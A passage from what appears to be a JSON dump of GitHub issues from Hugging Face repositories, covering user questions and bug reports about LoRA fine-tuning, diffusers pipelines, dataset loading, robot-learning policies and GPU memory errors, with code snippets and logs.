decoder-only model?", "body": "### Feature request\n\nThe current [example of AdaLoRA](https://github.com/huggingface/peft/blob/b2922565c4c4445706a87cf7b988c828b451fe61/examples/conditional_generation/peft_adalora_seq2seq.py) is on **facebook/bart-base**. 
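\r\n\r\nFor context, the usual way to focus a causal-LM loss on the assistant response is to set the label positions of the instruction/system tokens to -100, which CrossEntropyLoss ignores (a generic sketch, independent of AdaLoRA; the prompt length is illustrative):\r\n```python\r\nimport torch\r\n\r\ndef build_labels(input_ids: torch.Tensor, prompt_len: int) -> torch.Tensor:\r\n    # copy the inputs, then mask everything before the assistant response\r\n    labels = input_ids.clone()\r\n    labels[:, :prompt_len] = -100  # -100 is ignored by torch.nn.CrossEntropyLoss\r\n    return labels\r\n```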
Since AdaLoRA requires hand-crafted calculations on the loss, would it be possible to give me some hints on how to combine this with AdaLoRA for a decoder-only (e.g., Llama-Instruct) LM?\r\n\r\nSpecifically, I would like to mask out the loss calculation on the instruction part or system prompt, focusing only on the assistant response.\n\n### Motivation\n\nAdaLoRA requires hand-crafted calculations on the loss, which becomes complex when you want to mask out some system/instruction tokens.\n\n### Your contribution\n\nN.A.", "url": "https://github.com/huggingface/peft/issues/2262", "state": "closed", "labels": [], "created_at": "2024-12-05T12:03:31Z", "updated_at": "2025-01-18T15:03:29Z", "comments": 4, "user": "SpeeeedLee" }, { "repo": "huggingface/diffusers", "number": 10129, "title": " Does StableDiffusion3 have an image2image pipeline with ControlNet?", "body": "I want to use `ControlNet` with `StableDiffusion3`, providing a prompt, an original image, and a control image as inputs. However, I found that the `StableDiffusion3ControlNetPipeline` only supports prompts and control images as inputs. The `StableDiffusionControlNetImg2ImgPipeline` allows for providing a prompt, an original image, and a control image simultaneously, but it is not compatible with the `StableDiffusion3` model. Is there a `StableDiffusion3ControlNetImg2ImgPipeline` available?\r\n", "url": "https://github.com/huggingface/diffusers/issues/10129", "state": "closed", "labels": [ "New pipeline/model", "contributions-welcome" ], "created_at": "2024-12-05T09:40:03Z", "updated_at": "2025-01-02T20:02:33Z", "comments": 1, "user": "ZHJ19970917" }, { "repo": "huggingface/diffusers", "number": 10128, "title": "Is there any plan to support FasterCache?", "body": "It would be great to see support for FasterCache: https://github.com/Vchitect/FasterCache", "url": "https://github.com/huggingface/diffusers/issues/10128", "state": "closed", "labels": [ "wip", "performance" ], "created_at": "2024-12-05T09:11:19Z", "updated_at": "2025-03-21T04:05:06Z", "comments": 4, "user": "songh11" }, { "repo": "huggingface/datasets", "number": 7306, "title": "Creating a new dataset from a list loses information. (Audio Information Lost - either Datatype or Values).", "body": "### Describe the bug\r\n\r\nWhen creating a dataset from a list of datapoints, information about the individual items is lost.\r\n\r\nSpecifically, when creating a dataset from a list of datapoints (from another dataset), either the datatype is lost or the values are lost. See the examples below. \r\n\r\n-> What is the best way to create a dataset from a list of datapoints?\r\n\r\n---\r\ne.g.:\r\n**When running this code:**\r\n```python\r\nfrom datasets import load_dataset, Dataset\r\ncommonvoice_data = load_dataset(\"mozilla-foundation/common_voice_17_0\", \"it\", split=\"test\", streaming=True)\r\ndatapoint = next(iter(commonvoice_data))\r\nout = [datapoint]\r\nnew_data = Dataset.from_list(out) #this loses datatype information\r\nnew_data2= Dataset.from_list(out,features=commonvoice_data.features) #this loses value information\r\n```\r\n\r\n**We get the following**:\r\n---\r\n1. 
`datapoint`: (the original datapoint)\r\n```\r\n'audio': {'path': 'it_test_0/common_voice_it_23606167.mp3', 'array': array([0.00000000e+00, 0.00000000e+00, 0.00000000e+00, ...,\r\n 2.21619011e-05, 2.72628222e-05, 0.00000000e+00]), 'sampling_rate': 48000}\r\n ```\r\nOriginal Dataset Features:\r\n```\r\n>>> commonvoice_data.features\r\n'audio': Audio(sampling_rate=48000, mono=True, decode=True, id=None)\r\n```\r\n - Here we see column \"audio\", has the proper values (both `path` & and `array`) and has the correct datatype (Audio).\r\n\r\n \r\n ----\r\n 2. new_data[0]:\r\n```\r\n# Cannot be printed (as it prints the entire array).\r\n```\r\nNew Dataset 1 Features:\r\n```\r\n>>> new_data.features\r\n'audio': {'array': Sequence(feature=Value(dtype='float64', id=None), length=-1, id=None), 'path': Value(dtype='string', id=None), 'sampling_rate': Value(dtype='int64', id=None)}\r\n```\r\n - Here we see that the column \"audio\", has the correct values, but is not the Audio datatype anymore.\r\n\r\n---\r\n3. new_data2[0]:\r\n```\r\n'audio': {'path': None, 'array': array([0., 0., 0., ..., 0., 0., 0.]), 'sampling_rate': 48000},\r\n```\r\nNew Dataset 2 Features:\r\n```\r\n>>> new_data2.features\r\n'audio': Audio(sampling_rate=48000, mono=True, decode=True, id=None),\r\n```\r\n - Here we see that the column \"audio\", has the correct datatype, but all the array & path values were lost!\r\n\r\n\r\n\r\n### Steps to reproduce the bug\r\n\r\n## Run:\r\n```python\r\nfrom datasets import load_dataset, Dataset\r\ncommonvoice_data = load_dataset(\"mozilla-foundation/common_voice_17_0\", \"it\", split=\"test\", streaming=True)\r\ndatapoint = next(iter(commonvoice_data))\r\nout = [datapoint]\r\nnew_data = Dataset.from_list(out) #this loses datatype information\r\nnew_data2= Dataset.from_list(out,features=commonvoice_data.features) #this loses value information\r\n```\r\n\r\n\r\n\r\n\r\n\r\n### Expected behavior\r\n\r\n## Expected:\r\n```datapoint == new_data[0]```\r\n\r\nAND\r\n\r\n```datapoint == new_data2[0]```\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 3.1.0\r\n- Platform: Linux-6.2.0-37-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- `huggingface_hub` version: 0.26.2\r\n- PyArrow version: 15.0.2\r\n- Pandas version: 2.2.2\r\n- `fsspec` version: 2024.3.1", "url": "https://github.com/huggingface/datasets/issues/7306", "state": "open", "labels": [], "created_at": "2024-12-05T09:07:53Z", "updated_at": "2024-12-05T09:09:38Z", "comments": 0, "user": "ai-nikolai" }, { "repo": "huggingface/lerobot", "number": 549, "title": "Low accuracy for act policy on pushT env", "body": "The highest success rate is 44%, as n_decoder_layers=7. 
Are there any other tricks for this?", "url": "https://github.com/huggingface/lerobot/issues/549", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2024-12-05T06:18:06Z", "updated_at": "2025-10-19T02:32:37Z", "user": "KongCDY" }, { "repo": "huggingface/Google-Cloud-Containers", "number": 128, "title": "Can we use Multi-LORA on CPU", "body": "Hi,\r\n\r\nI'm currently following this doc: https://huggingface.co/docs/google-cloud/en/examples/gke-tgi-multi-lora-deployment\r\n\r\nAfter hitting the error \"Can\u2019t scale up due to exceeded quota\" and doing some research, I suspect that my free-trial ($300) account is not able to increase its GPU quota (even though I have activated my account so it is no longer a trial; I would have to contact sales).\r\n\r\nIs there any way I can run this with CPU instead?\r\n\r\nThank you", "url": "https://github.com/huggingface/Google-Cloud-Containers/issues/128", "state": "open", "labels": [ "question" ], "created_at": "2024-12-05T05:42:51Z", "updated_at": "2024-12-12T10:06:43Z", "user": "AndrewNgo-ini" }, { "repo": "huggingface/peft", "number": 2260, "title": "Is it possible to support the transformer engine when using LoRA in Megatron?", "body": "### Feature request\n\nI am currently using the Megatron framework and want to use LoRA for training. I saw that the Megatron format is supported: in https://github.com/huggingface/peft/blob/main/src/peft/tuners/lora/tp_layer.py, RowParallelLinear and ColumnParallelLinear do the adaptation. But if I use the transformer engine, the corresponding TELayerNormColumnParallelLinear and TERowParallelLinear will not be adapted.\n\n### Motivation\n\nThis would better support the Megatron framework using LoRA.\n\n### Your contribution\n\nI don't have a PR.", "url": "https://github.com/huggingface/peft/issues/2260", "state": "closed", "labels": [], "created_at": "2024-12-05T03:24:15Z", "updated_at": "2025-01-12T15:03:29Z", "comments": 3, "user": "liulong11" }, { "repo": "huggingface/diffusers", "number": 10120, "title": "memory consumption of dreambooth+SD3", "body": "Hi, I am running DreamBooth SD3 with a single A100 GPU. I reduced the resolution to 256, but it still needs more memory than a single A100 has. Is this huge memory consumption normal?\r\n\r\n```\r\n!python train_dreambooth_sd3.py \\\r\n --pretrained_model_name_or_path=\"stabilityai/stable-diffusion-3-medium-diffusers\" \\\r\n --instance_data_dir=\"erhu\" \\\r\n --output_dir=\"trained-sd3\" \\\r\n --mixed_precision=\"fp16\" \\\r\n --instance_prompt=\"a photo of erhu\" \\\r\n --resolution=256 \\\r\n --train_batch_size=1 \\\r\n --gradient_accumulation_steps=4 \\\r\n --learning_rate=1e-4 \\\r\n --report_to=\"wandb\" \\\r\n --lr_scheduler=\"constant\" \\\r\n --lr_warmup_steps=0 \\\r\n --max_train_steps=300 \\\r\n --validation_prompt=\"A photo of erhu on the grass\" \\\r\n --validation_epochs=25 \\\r\n --use_8bit_adam \\\r\n --seed=\"0\" \\\r\n --push_to_hub\r\n```\r\n`torch.OutOfMemoryError: CUDA out of memory. Tried to allocate 36.00 MiB. GPU 0 has a total capacity of 39.56 GiB of which 2.81 MiB is free. Process 16368 has 39.55 GiB memory in use. Of the allocated memory 38.05 GiB is allocated by PyTorch, and 1021.72 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. 
See documentation for Memory Management `\r\nThanks", "url": "https://github.com/huggingface/diffusers/issues/10120", "state": "closed", "labels": [ "bug", "stale", "training" ], "created_at": "2024-12-04T19:39:04Z", "updated_at": "2025-01-27T01:30:18Z", "comments": 5, "user": "KolvacS-W" }, { "repo": "huggingface/diffusers", "number": 10112, "title": "Detail-Daemon diffusers", "body": "**Describe the solution you'd like.**\r\nDetail-Daemon: https://github.com/Jonseed/ComfyUI-Detail-Daemon\r\n\r\nHow can Detail-Daemon be implemented in diffusers, as seen in https://github.com/Jonseed/ComfyUI-Detail-Daemon? Will there be an official component for it in the future?", "url": "https://github.com/huggingface/diffusers/issues/10112", "state": "open", "labels": [ "wip", "consider-for-modular-diffusers" ], "created_at": "2024-12-04T09:14:39Z", "updated_at": "2025-01-03T18:01:24Z", "comments": 10, "user": "NicholasCao" }, { "repo": "huggingface/lerobot", "number": 547, "title": "How to make a custom LeRobotDataset with v2?", "body": "Hi folks, thanks for the amazing open source work!\r\n\r\nI am trying to make a custom dataset to use with the LeRobotDataset format.\r\n\r\nThe readme says to copy the example scripts here, which I've done, and I have a working format script of my own.\r\n\r\nhttps://github.com/huggingface/lerobot/blob/8e7d6970eaf5a64b8af6ec45586d201b8ca9ef16/README.md?plain=1#L323\r\n\r\nBut when it comes time to create the dataset, `push_dataset_to_hub.py` uses `LeRobotDataset.from_preloaded`, which is no longer supported in [dataset V2](https://github.com/huggingface/lerobot/pull/461):\r\n\r\nhttps://github.com/huggingface/lerobot/blob/8e7d6970eaf5a64b8af6ec45586d201b8ca9ef16/lerobot/scripts/push_dataset_to_hub.py#L216\r\n\r\nSo I'm just wondering what the proper way of loading your own custom local dataset is. \r\n\r\nThank you in advance for your help!", "url": "https://github.com/huggingface/lerobot/issues/547", "state": "closed", "labels": [ "question", "dataset", "stale" ], "created_at": "2024-12-04T08:00:19Z", "updated_at": "2025-10-08T08:28:34Z", "user": "alik-git" }, { "repo": "huggingface/lerobot", "number": 545, "title": "Poor success rate in complex scenarios", "body": "Hi, I used a Moss robot to play with and train the ACT policy. With one Lego piece, it can finish the grabbing task at a high success rate after recording 50+ episodes with different pose & location variants, but generalization to multiple pieces at random locations is not promising.\r\n\r\nWhen I started to add complexity (for example, 6 pieces with different colors, like the picture below), I placed the Lego pieces a bit randomly and recorded one episode continuously until all the pieces were grabbed (rather than one piece per episode); furthermore, episodes were recorded in a fixed order.\r\n![IMG_4681 HEIC](https://github.com/user-attachments/assets/dbe58ebc-0690-4563-ab1d-cf0660305611)\r\n\r\nHere is what I found:\r\n1. The trained policy cannot work if the gripping sequence is randomized; in other words, it has to keep a fixed spatial order, e.g. from upper left to lower right.\r\n2. The trained policy cannot work if the [location, color, pose] combination was not seen in the training dataset, especially location combos. \r\n3. At first I suspected that only the iPhone and Mac fixed cameras could not give enough depth perception, so I bought a wide-angle USB camera and mounted it on the gripper; as a result, the success rate didn't get higher. \r\n![20241204141608](https://github.com/user-attachments/assets/346a6c22-7516-4854-ac1f-5d7029af5336)\r\n\r\n4. 
Enlarging dataset size to 120+ episodes didn't give obvious change.\r\n\r\n\r\n\r\n\r\nI was wondering how to improve this task, is the method I used to record data wrong or due to the generalization of ACT is limited? \r\n\r\nLooking forward to hearing answers or experience", "url": "https://github.com/huggingface/lerobot/issues/545", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2024-12-04T06:20:31Z", "updated_at": "2025-10-08T08:28:45Z", "user": "mydhui" }, { "repo": "huggingface/frp", "number": 14, "title": "where is the code of frpc-gradio-0.3", "body": "", "url": "https://github.com/huggingface/frp/issues/14", "state": "closed", "labels": [], "created_at": "2024-12-04T05:37:34Z", "updated_at": "2025-03-11T00:55:39Z", "user": "BoyuanJiang" }, { "repo": "huggingface/peft", "number": 2255, "title": "Is this the right way to check whether a model has been trained as expected?", "body": "I'd like to check whether my PEFT model has been trained as intended, i.e. whether the PEFT weights have changed, but not the base weights. The following code works, but I'm sure a PEFT specialist will suggest a better way.\r\n\r\n```python\r\nimport tempfile\r\n\r\nimport torch\r\nfrom datasets import load_dataset\r\nfrom peft import LoraConfig, get_peft_model\r\nfrom transformers import AutoModelForCausalLM\r\n\r\nfrom trl import SFTConfig, SFTTrainer\r\n\r\n\r\n# Get the base model\r\nmodel_id = \"trl-internal-testing/tiny-Qwen2ForCausalLM-2.5\"\r\nmodel = AutoModelForCausalLM.from_pretrained(model_id)\r\n\r\n# Get the base model parameter names\r\nbase_param_names = [f\"base_model.model.{n}\" for n, _ in model.named_parameters()]\r\n\r\n# Turn the model into a peft model\r\nlora_config = LoraConfig()\r\nmodel = get_peft_model(model, lora_config)\r\n\r\n# Get the dataset\r\ndataset = load_dataset(\"trl-internal-testing/zen\", \"standard_language_modeling\", split=\"train\")\r\n\r\nwith tempfile.TemporaryDirectory() as tmp_dir:\r\n # Initialize the trainer\r\n training_args = SFTConfig(output_dir=tmp_dir, report_to=\"none\")\r\n trainer = SFTTrainer(args=training_args, model=model, train_dataset=dataset)\r\n\r\n # Save the initial parameters to compare them later\r\n previous_trainable_params = {n: param.clone() for n, param in trainer.model.named_parameters()}\r\n\r\n trainer.train()\r\n\r\n # Check the peft params have changed and the base model params have not changed\r\n for n, param in previous_trainable_params.items():\r\n new_param = trainer.model.get_parameter(n)\r\n if n in base_param_names: # We expect the base model parameters to be the same\r\n if not torch.allclose(param, new_param):\r\n print(f\"Parameter {n} has changed, but it should not have changed\")\r\n elif \"base_layer\" not in n: # We expect the peft parameters to be different (except for the base layer)\r\n if torch.allclose(param, new_param):\r\n print(f\"Parameter {n} has not changed, but it should have changed\")\r\n```", "url": "https://github.com/huggingface/peft/issues/2255", "state": "closed", "labels": [], "created_at": "2024-12-03T17:36:00Z", "updated_at": "2024-12-04T12:01:37Z", "comments": 5, "user": "qgallouedec" }, { "repo": "huggingface/peft", "number": 2251, "title": "a guide to add a new fine-tuning method in the doc", "body": "### Feature request\n\nHello, I am a researcher in the finetune area. Can you publish a guide to add a new fine-tuning method in the doc? 
I think researchers like me would be glad to experiment with their methods based on this repo.\n\n### Motivation\n\nResearchers like me are glad to experiment with their methods based on this repo, but don't know how to add one.\n\n### Your contribution\n\nYes, but after verifying the feasibility of my method.", "url": "https://github.com/huggingface/peft/issues/2251", "state": "closed", "labels": [], "created_at": "2024-12-03T13:46:02Z", "updated_at": "2024-12-04T02:12:35Z", "comments": 2, "user": "YF-T" }, { "repo": "huggingface/diffusers", "number": 10076, "title": "Do we have any script to convert from hf format to the original format?", "body": "**Is your feature request related to a problem? Please describe.**\r\nscripts/convert_cogvideox_to_diffusers.py\r\nWith this script, we can convert cogvideox -> diffusers. Do we have the opposite script?\r\n\r\ncc @yiyixuxu \r\n", "url": "https://github.com/huggingface/diffusers/issues/10076", "state": "open", "labels": [ "good first issue", "contributions-welcome", "conversion script" ], "created_at": "2024-12-02T07:49:34Z", "updated_at": "2024-12-02T18:22:50Z", "comments": 1, "user": "foreverpiano" }, { "repo": "huggingface/trl", "number": 2424, "title": "How to calculate the loss of multi-turn dialogue training data?", "body": "In a single data entry containing multiple turns of dialogue, abbreviated as Q1 + A1 + Q2 + A2, does this project calculate the loss only for the last answer of the multi-turn dialogue, or for each answer?", "url": "https://github.com/huggingface/trl/issues/2424", "state": "closed", "labels": [ "\u2753 question", "\ud83c\udfcb SFT" ], "created_at": "2024-12-02T07:47:17Z", "updated_at": "2025-01-20T02:47:34Z", "user": "NUMB1234" }, { "repo": "huggingface/diffusers", "number": 10074, "title": "how to install diffusers 0.32.0", "body": "The FluxFillPipeline needs diffusers >= 0.32.0, but I don't know how to install that version. Can anyone help me? Thanks in advance.", "url": "https://github.com/huggingface/diffusers/issues/10074", "state": "closed", "labels": [], "created_at": "2024-12-02T07:05:24Z", "updated_at": "2024-12-02T19:11:34Z", "user": "babyta" }, { "repo": "huggingface/diffusers", "number": 10070, "title": "Xformers info, memory efficient attention unavailable", "body": "### Describe the bug\r\n\r\nI just started learning Stable Diffusion on Win11. After I installed xformers, I found that several memory_efficient_attention kernels are unavailable. Is it possible to make them available? 
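\r\n\r\nFor context, I enable it with the standard diffusers call, nothing custom on my side:\r\n```python\r\npipe.enable_xformers_memory_efficient_attention()\r\n```\r\n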
Thanks for any help.\r\n\r\n### Reproduction\r\n\r\nxFormers 0.0.28.post3\r\nmemory_efficient_attention.ckF: unavailable\r\nmemory_efficient_attention.ckB: unavailable\r\nmemory_efficient_attention.ck_decoderF: unavailable\r\nmemory_efficient_attention.ck_splitKF: unavailable\r\nmemory_efficient_attention.cutlassF-pt: available\r\nmemory_efficient_attention.cutlassB-pt: available\r\nmemory_efficient_attention.fa2F@v2.6.3-24-gbdf733b: available\r\nmemory_efficient_attention.fa2B@v2.6.3-24-gbdf733b: available\r\nmemory_efficient_attention.fa3F@0.0.0: unavailable\r\nmemory_efficient_attention.fa3B@0.0.0: unavailable\r\nmemory_efficient_attention.triton_splitKF: available\r\nindexing.scaled_index_addF: available\r\nindexing.scaled_index_addB: available\r\nindexing.index_select: available\r\nsequence_parallel_fused.write_values: available\r\nsequence_parallel_fused.wait_values: available\r\nsequence_parallel_fused.cuda_memset_32b_async: available\r\nsp24.sparse24_sparsify_both_ways: available\r\nsp24.sparse24_apply: available\r\nsp24.sparse24_apply_dense_output: available\r\nsp24._sparse24_gemm: available\r\nsp24._cslt_sparse_mm_search@0.0.0: available\r\nsp24._cslt_sparse_mm@0.0.0: available\r\nswiglu.dual_gemm_silu: available\r\nswiglu.gemm_fused_operand_sum: available\r\nswiglu.fused.p.cpp: available\r\nis_triton_available: True\r\npytorch.version: 2.5.1+cu124\r\npytorch.cuda: available\r\ngpu.compute_capability: 8.9\r\ngpu.name: NVIDIA GeForce RTX 4070\r\ndcgm_profiler: unavailable\r\nbuild.info: available\r\nbuild.cuda_version: 1204\r\nbuild.hip_version: None\r\nbuild.python_version: 3.10.11\r\nbuild.torch_version: 2.5.1+cu124\r\nbuild.env.TORCH_CUDA_ARCH_LIST: 6.0+PTX 7.0 7.5 8.0+PTX 9.0a\r\nbuild.env.PYTORCH_ROCM_ARCH: None\r\nbuild.env.XFORMERS_BUILD_TYPE: Release\r\nbuild.env.XFORMERS_ENABLE_DEBUG_ASSERTIONS: None\r\nbuild.env.NVCC_FLAGS: -allow-unsupported-compiler\r\nbuild.env.XFORMERS_PACKAGE_FROM: wheel-v0.0.28.post3\r\nbuild.nvcc_version: 12.4.131\r\nsource.privacy: open source\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nWin11, Python 3.10.6,pytorch 2.5.1+cu124, xFormers 0.0.28.post3, triton==3.0.0\r\n\r\n### Who can help?\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10070", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-12-01T16:14:21Z", "updated_at": "2025-01-01T15:03:09Z", "comments": 1, "user": "Stareshine" }, { "repo": "huggingface/Google-Cloud-Containers", "number": 126, "title": "Deployment error on GKE", "body": "Hello!\r\nI deployed Gemma 2 2b it on GKE with autopilot mode following these instructions https://cloud.google.com/kubernetes-engine/docs/tutorials/serve-gemma-gpu-tgi#autopilot. There's this error Node scale up in zones us-central1-c associated with this pod failed: GCE quota exceeded. Pod is at risk of not being scheduled. I checked quota there's enough GPU. However the pod is in pending state.", "url": "https://github.com/huggingface/Google-Cloud-Containers/issues/126", "state": "closed", "labels": [ "question" ], "created_at": "2024-12-01T14:09:29Z", "updated_at": "2025-01-07T08:39:07Z", "user": "piksida" }, { "repo": "huggingface/lerobot", "number": 538, "title": "questions about load dataset for localhost, make own policy and use headless eval mode", "body": "Hello, I'm trying to download a data set on hugging face to the local and then call this data set from the local. For example, 'aloha_sim_insertion_scripted_image' , its format is many 'episode_000000.parquet' files . 
Then how can I load this format with the LeRobotDataset() function, or in some other way?\r\n\r\nSecond, I want to create my own policy. After parsing the code framework, I think I may need to create my policy code files by mimicking the following files:\r\n+ lerobot/common/policies/act/configuration_act.py\r\n+ lerobot/common/policies/act/modeling_act.py\r\nHowever, I am having some difficulties in making my own policy now. I want to create a new policy to implement my idea, which is to introduce the concept of contrastive learning. That is to say, the policy enables the agent to learn from the correct samples and stay away from the wrong samples. I would like to ask you what should be modified to implement this idea.\r\n\r\nI really need examples of this, and it would be very helpful if you could give me detailed advice!\r\n\r\nFinally, my server is headless, which means that when evaluating a policy there is no way to call MuJoCo to view the evaluation. Can the code framework support headless mode and save the evaluation video?\r\n\r\nAs a new researcher in this field, it would be great if I could communicate further with you about the above issues. Thank you very much!\r\n\r\nBest wishes : )", "url": "https://github.com/huggingface/lerobot/issues/538", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2024-12-01T03:32:06Z", "updated_at": "2025-10-19T02:32:41Z", "user": "zhouzhq2021" }, { "repo": "huggingface/lerobot", "number": 536, "title": "How auto calibration works", "body": "Are there any details about run_arm_auto_calibration_moss and run_arm_auto_calibration_so100 that we can refer to? I read the code but couldn't fully understand it. \r\n\r\nWhen should we use auto calibration instead of the manual calibration that calculates the homing_offset of the rotated (90d) pose?\r\n\r\nI want to check whether my understanding is correct: for manual calibration, the homing offset includes 2 terms, 1) the true offset caused by motor installation, and 2) human bias due to manually rotating the motor. If correct, is there a way to also remove the second term? When using multiple robots for data collection, I guess removing term (2) is required.", "url": "https://github.com/huggingface/lerobot/issues/536", "state": "closed", "labels": [ "question", "robots", "stale" ], "created_at": "2024-11-30T18:04:23Z", "updated_at": "2025-10-08T08:37:24Z", "user": "wzds2015" }, { "repo": "huggingface/accelerate", "number": 3269, "title": "\ud83e\udd28Question: What if the model has float16 dtype and `mixed_precision` is set to fp16 as well?", "body": "As the title:\r\n\r\n**\ud83e\udd28Question: What if the model has float16 dtype and `mixed_precision` is set to fp16 as well?**\r\n\r\n- Will it compute in the original float16, as if auto mixed precision never existed?\r\n- Or will some modules that easily overflow (e.g. BatchNorm, LayerNorm) be upcast to float32, as AMP fp32->fp16 does?\r\n\r\nCould someone please help me with this question? \u2764", "url": "https://github.com/huggingface/accelerate/issues/3269", "state": "closed", "labels": [], "created_at": "2024-11-29T17:55:58Z", "updated_at": "2025-01-07T15:33:26Z", "user": "townwish4git" }, { "repo": "huggingface/chat-macOS", "number": 36, "title": "Document how to download and install a local model", "body": "First, thanks very much for this work!\r\nI'm a bit of a newbie here.\r\n\r\nThe 'Get' button takes you to the web page for the example; however, chat-macOS instructions are not part of the options. 
Also, where do you place the downloaded model for the \"add +\" option, and where do the models go? Is there a way to configure where models are stored?\r\n\r\nThanks!\r\n\r\n", "url": "https://github.com/huggingface/chat-macOS/issues/36", "state": "open", "labels": [], "created_at": "2024-11-29T17:18:43Z", "updated_at": "2024-11-29T17:18:43Z", "user": "deepcoder" }, { "repo": "huggingface/diffusers", "number": 10055, "title": "Training script for a ControlNet based on SD3 does not work", "body": "### Describe the bug\n\nHi @sayakpaul and all others :)\r\n\r\n\r\nThe training script for a ControlNet based on Stable Diffusion 3 seems not to work.\r\n\r\n**RuntimeError: Given groups=1, weight of size [1536, 17, 2, 2], expected input[4, 16, 64, 64] to have 17 channels, but got 16 channels instead**\r\n\r\n\r\n\r\nI tried to follow the documentation on how to train a ControlNet based on SD3.\r\nI used a custom dataset that I also used to train a ControlNet based on SD1.5. \r\n\r\nOnce I run the script, I receive a tensor-channels-do-not-match error.\n\n### Reproduction\n\n!accelerate launch train_controlnet_sd3.py \\\r\n --pretrained_model_name_or_path=\"stabilityai/stable-diffusion-3-medium-diffusers\" \\\r\n --output_dir=\"/home/xxx/models/v1/cn-stablediff-v3_out\" \\\r\n --dataset_name=\"StudentYannik/v1-prepared-cn\" \\\r\n --resolution=512 \\\r\n --learning_rate=1e-5 \\\r\n --max_train_steps=10000 \\\r\n --train_batch_size=4 \\\r\n --num_train_epochs=10 \\\r\n --gradient_accumulation_steps=4\n\n### Logs\n\n```shell\n11/29/2024 14:35:32 - INFO - __main__ - Distributed environment: NO\r\nNum processes: 1\r\nProcess index: 0\r\nLocal process index: 0\r\nDevice: cuda\r\n\r\nMixed precision type: no\r\n\r\nYou set `add_prefix_space`. The tokenizer needs to be converted from the slow tokenizers\r\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\nYou are using a model of type t5 to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\n{'base_image_seq_len', 'base_shift', 'max_image_seq_len', 'use_beta_sigmas', 'invert_sigmas', 'use_karras_sigmas', 'use_dynamic_shifting', 'max_shift', 'use_exponential_sigmas'} was not found in config. Values will be initialized to default values.\r\nDownloading shards: 100%|██████████████████████| 2/2 [00:00<00:00, 12539.03it/s]\r\nLoading checkpoint shards: 100%|██████████████████| 2/2 [00:09<00:00, 4.92s/it]\r\n{'mid_block_add_attention'} was not found in config. Values will be initialized to default values.\r\n{'dual_attention_layers', 'qk_norm'} was not found in config. Values will be initialized to default values.\r\n11/29/2024 14:35:54 - INFO - __main__ - Initializing controlnet weights from transformer\r\n{'dual_attention_layers', 'pos_embed_type', 'qk_norm', 'use_pos_embed', 'force_zeros_for_pooled_projection'} was not found in config. 
Values will be initialized to default values.\r\n11/29/2024 14:36:14 - INFO - __main__ - ***** Running training *****\r\n11/29/2024 14:36:14 - INFO - __main__ - Num examples = 150\r\n11/29/2024 14:36:14 - INFO - __main__ - Num batches each epoch = 38\r\n11/29/2024 14:36:14 - INFO - __main__ - Num Epochs = 1000\r\n11/29/2024 14:36:14 - INFO - __main__ - Instantaneous batch size per device = 4\r\n11/29/2024 14:36:14 - INFO - __main__ - Total train batch size (w. parallel, distributed & accumulation) = 16\r\n11/29/2024 14:36:14 - INFO - __main__ - Gradient Accumulation steps = 4\r\n11/29/2024 14:36:14 - INFO - __main__ - Total optimization steps = 10000\r\nSteps: 0%| | 0/10000 [00:00\r\n main(args)\r\n File \"/home/xxxx/repos/control-net/diffusers/examples/controlnet/train_controlnet_sd3.py\", line 1278, in main\r\n control_block_res_samples = controlnet(\r\n File \"/home/xxxx/repos/control-net/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\r\n return self._call_impl(*args, **kwargs)\r\n File \"/home/xxxx/repos/control-net/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/home/xxxx/repos/control-net/diffusers/src/diffusers/models/controlnets/controlnet_sd3.py\", line 365, in forward\r\n hidden_states = hidden_states + self.pos_embed_input(controlnet_cond)\r\n File \"/home/xxxx/repos/control-net/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\r\n return self._call_impl(*args, **kwargs)\r\n File \"/home/xxxx/repos/control-net/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/home/xxxx/repos/control-net/diffusers/src/diffusers/models/embeddings.py\", line 266, in forward\r\n latent = self.proj(latent)\r\n File \"/home/xxxx/repos/control-net/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\r\n return self._call_impl(*args, **kwargs)\r\n File \"/home/xxxx/repos/control-net/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"", "url": "https://github.com/huggingface/diffusers/issues/10055", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-11-29T13:46:29Z", "updated_at": "2025-02-03T15:03:46Z", "comments": 17, "user": "Putzzmunta" }, { "repo": "huggingface/diffusers", "number": 10050, "title": "Is there any img2img KDiffusion equivalent of StableDiffusionKDiffusionPipeline?", "body": "### Model/Pipeline/Scheduler description\n\nI'm working on result alignment between diffusers and A1111 webui. \r\nIn txt2img scene, I can achieve via `StableDiffusionKDiffusionPipeline`, refer to https://github.com/huggingface/diffusers/issues/3253. 
